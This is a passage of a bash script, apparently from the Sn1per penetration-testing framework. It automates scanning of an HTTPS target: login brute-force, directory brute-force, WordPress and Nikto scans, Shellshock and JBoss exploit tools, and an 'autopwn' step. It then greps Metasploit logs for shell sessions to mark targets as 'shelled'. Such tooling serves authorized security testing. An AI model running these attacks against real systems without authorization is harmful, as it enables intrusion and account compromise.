sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-https-$PORT > $LOOT_DIR/web/wig-$TARGET-https-$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/wig-$TARGET-https-$PORT 2> /dev/null
fi
if [[ "$SSL" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
sslscan --no-failed $TARGET:$PORT | tee $LOOT_DIR/web/sslscan-$TARGET-$PORT.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET-$PORT.raw > $LOOT_DIR/web/sslscan-$TARGET-$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/sslscan-$TARGET-$PORT.raw 2> /dev/null
echo ""
fi
if [[ "$SSL_INSECURE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR INSECURE SSL/TLS CONFIGURATIONS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl https://$TARGET:$PORT 2> $LOOT_DIR/web/curldebug-$TARGET-$PORT.txt > /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ $CUTYCAPT = "1" ]]; then
if [[ $DISTRO == "blackarch" ]]; then
/bin/CutyCapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
fi
fi
if [[ $WEBSCREENSHOT = "1" ]]; then
cd $LOOT_DIR
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium https://$TARGET:$PORT
fi
if [[ "$BURP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$VERBOSE" == "1" ]]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:$PORT\"]}\"$RESET"
fi
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:$PORT\"]}"
echo ""
fi
if [[ "$NMAP_SCRIPTS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap -Pn -p $PORT -sV -v --script-timeout 90 --script=http-auth-finder,http-auth,http-brute,/usr/share/nmap/scripts/vulners,http-default-accounts $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null
fi
if [[ "$PASSIVE_SPIDER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2022-33-index?url=*.$TARGET&output=json" -H 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36' 2> /dev/null | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$WAYBACKMACHINE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$HACKERTARGET" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s GET "https://api.hackertarget.com/pagelinks/?q=https://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid|error getting links" | tee $LOOT_DIR/web/hackertarget-https-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$GAU" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING GUA URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
gau -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$BLACKWIDOW" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
blackwidow -u https://$TARGET:$PORT -l 3 -v n 2> /dev/null
cp -f /usr/share/blackwidow/"$TARGET"_"$PORT"/"$TARGET"_"$PORT"-*.txt $LOOT_DIR/web/ 2>/dev/null
cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
mv -f $LOOT_DIR/web/spider-$TARGET.txtr $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
fi
fi
if [[ "$INJECTX" == "1" ]]; then
rm -f $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.raw 2> /dev/null
#cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'https\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.txt
for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "https\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "https\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.txt; done; done;
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.txt
fi
source $INSTALL_DIR/modes/static-grep-search.sh
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
source $INSTALL_DIR/modes/javascript-analysis.sh
fi
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
if [[ "$WEB_BRUTE_COMMONSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-common.txt -fw -r
fi
fi
if [[ "$WEB_BRUTE_FULLSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-full.txt -fw -r
fi
fi
if [[ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-exploits.txt -fw -r
fi
fi
if [[ "$DIRSEARCH" == "1" ]]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt| awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
fi
fi
if [[ "$GOBUSTER" == "1" ]]; then
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET:${PORT}/robots.txt -O $LOOT_DIR/web/robots-$TARGET:${PORT}-https.txt 2> /dev/null
if [[ "$CLUSTERD" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
clusterd --sVl -i $TARGET -p ${PORT} 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-port${PORT}.txt
fi
if [[ "$CMSMAP" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cmsmap https://$TARGET:${PORT} | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}a.txt
echo ""
cmsmap https://$TARGET:${PORT}/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}b.txt
echo ""
fi
if [[ "$WPSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$WP_API_KEY" ]]; then
wpscan --url https://$TARGET:${PORT} --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.raw
echo ""
wpscan --url https://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.raw
echo ""
else
wpscan --url https://$TARGET:${PORT} --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.raw
echo ""
wpscan --url https://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.raw
fi
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.txt
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.txt
rm -f $LOOT_DIR/web/wpscan-$TARGET-http*.raw 2> /dev/null
fi
if [[ "$NIKTO" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nikto -h https://$TARGET:${PORT} -output $LOOT_DIR/web/nikto-$TARGET-https-port${PORT}.txt
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-https-port${PORT}.txt
fi
if [[ "$SHOCKER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --sVl --port ${PORT} | tee $LOOT_DIR/web/shocker-$TARGET-port${PORT}.txt
fi
if [[ "$JEXBOSS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd /tmp/
python3 /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET:${PORT} | tee $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw > $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw 2> /dev/null
cd $INSTALL_DIR
fi
if [[ "$SMUGGLER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u https://$TARGET:${PORT} | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt
fi
if [[ "$NUCLEI" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NUCLEI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nuclei -silent -t /root/nuclei-templates/ -c $THREADS -target https://$TARGET:${PORT} -o $LOOT_DIR/web/nuclei-https-${TARGET}-port${PORT}.txt
fi
cd $INSTALL_DIR
SSL="true"
source $INSTALL_DIR/modes/web_autopwn.sh
source $INSTALL_DIR/modes/osint_stage_2.sh
fi
if [[ "$BURP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:$PORT\"]}"
echo ""
for a in {1..30};
do
echo -n "[-] SCAN #$a: "
curl -sI "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | grep HTTP | awk '{print $2}'
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
while [[ ${#BURP_STATUS} -gt "5" ]];
do
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
BURP_STATUS_FULL=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3)
echo "[i] STATUS: $BURP_STATUS_FULL"
sleep 15
done
done
echo "[+] VULNERABILITIES: "
echo "----------------------------------------------------------------"
for a in {1..30};
do
curl -s "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | jq '.issue_events[].issue | "[" + .severity + "] " + .name + " - " + .origin + .path' | sort -u | sed 's/\"//g' | tee $LOOT_DIR/web/burpsuite-$TARGET-$a.txt
done
echo "[-] Done!"
fi
if [[ "$ZAP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING OWASP ZAP SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[i] Scanning: https://$TARGET:$PORT/"
sudo python3 /usr/share/sniper/bin/zap-scan.py "https://$TARGET:$PORT/"
DATE=$(date +"%Y%m%d%H%M")
sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html
cp -f $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-https.html 2> /dev/null
echo "[i] Scan complete."
echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html"
fi
if [[ "$ARACHNI_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ARACHNI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
DATE=$(date +"%Y%m%d%H%M")
mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives http://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
unzip arachni.zip
cd $INSTALL_DIR
fi
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
SSL="true"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
source $file
done
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
fi
source $INSTALL_DIR/modes/sc0pe.sh
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
if [[ ${#VULNERABLE_METASPLOIT} -ge 5 ]]; then
echo "$VULNERABLE_METASPLOIT" > $LOOT_DIR/output/vulnerable-metasploit-$TARGET.txt 2> /dev/null
fi
VULNERABLE_SHELLSHOCK=$(egrep -h -i -s "The following URLs appear to be exploitable:" $LOOT_DIR/web/shocker-$TARGET-*.txt 2> /dev/null)
if [[ ${#VULNERABLE_SHELLSHOCK} -ge 5 ]]; then
echo "$VULNERABLE_SHELLSHOCK" > $LOOT_DIR/output/vulnerable-shellshock-$TARGET.txt 2> /dev/null
fi
SHELLED=$(egrep -h -i -s "Meterpreter session|Command executed|File(s) found:|Command Stager progress|File uploaded|Command shell session" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
if [[ ${#SHELLED} -ge 5 ]]; then
echo "$SHELLED" > $LOOT_DIR/output/shelled-$TARGET.txt 2> /dev/null
fi
